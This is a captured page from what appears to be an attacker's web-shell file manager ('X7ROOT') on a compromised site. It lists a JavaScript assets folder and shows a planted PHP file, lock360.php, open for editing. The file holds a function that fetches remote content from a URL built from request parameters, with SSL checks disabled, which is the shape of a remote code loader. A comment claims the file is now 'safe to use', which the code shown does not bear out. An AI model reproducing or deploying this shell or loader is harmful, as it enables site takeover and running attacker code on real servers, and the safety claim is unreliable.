X7ROOT File Manager
Current Path:
/home/jeyam/public_html/assets/js
home
/
jeyam
/
public_html
/
assets
/
js
/
📁
..
📄
.htaccess
(0 B)
📄
2index.php
(0 B)
📄
aos.js
(13.91 KB)
📄
appear.js
(4.28 KB)
📄
bootstrap-select.min.js
(46.59 KB)
📄
bootstrap.bundle.min.js
(74.52 KB)
📄
custom.js
(23.32 KB)
📄
isotope.js
(36.89 KB)
📄
jquery-ui.js
(526.78 KB)
📄
jquery.bootstrap-touchspin.js
(19.08 KB)
📄
jquery.bxslider.min.js
(18.91 KB)
📄
jquery.countTo.js
(3.38 KB)
📄
jquery.countdown.min.js
(4.94 KB)
📄
jquery.easing.min.js
(5.42 KB)
📄
jquery.enllax.min.js
(1.53 KB)
📄
jquery.fancybox.js
(150.49 KB)
📄
jquery.js
(286.55 KB)
📄
jquery.magnific-popup.min.js
(19.74 KB)
📄
jquery.mixitup.min.js
(28.26 KB)
📄
jquery.paroller.min.js
(2.71 KB)
📄
jquery.polyglot.language.switcher.js
(13.25 KB)
📄
jquery.tabs.min.js
(994 B)
📄
knob.js
(26.39 KB)
📄
lazyload.js
(14.94 KB)
📄
lock360.php
(705 B)
📄
map-script.js
(5.52 KB)
📄
nouislider.js
(13.35 KB)
📄
owl.js
(87.9 KB)
📄
scrollbar.js
(39.6 KB)
📄
slick.js
(85.11 KB)
📄
timePicker.js
(0 B)
📄
validation.js
(35.31 KB)
📄
whatsappme.min.js
(2.68 KB)
📄
wow.js
(6.15 KB)
Editing: lock360.php
<?php function GC($a) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); }return $code;} /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */
Upload File
Create Folder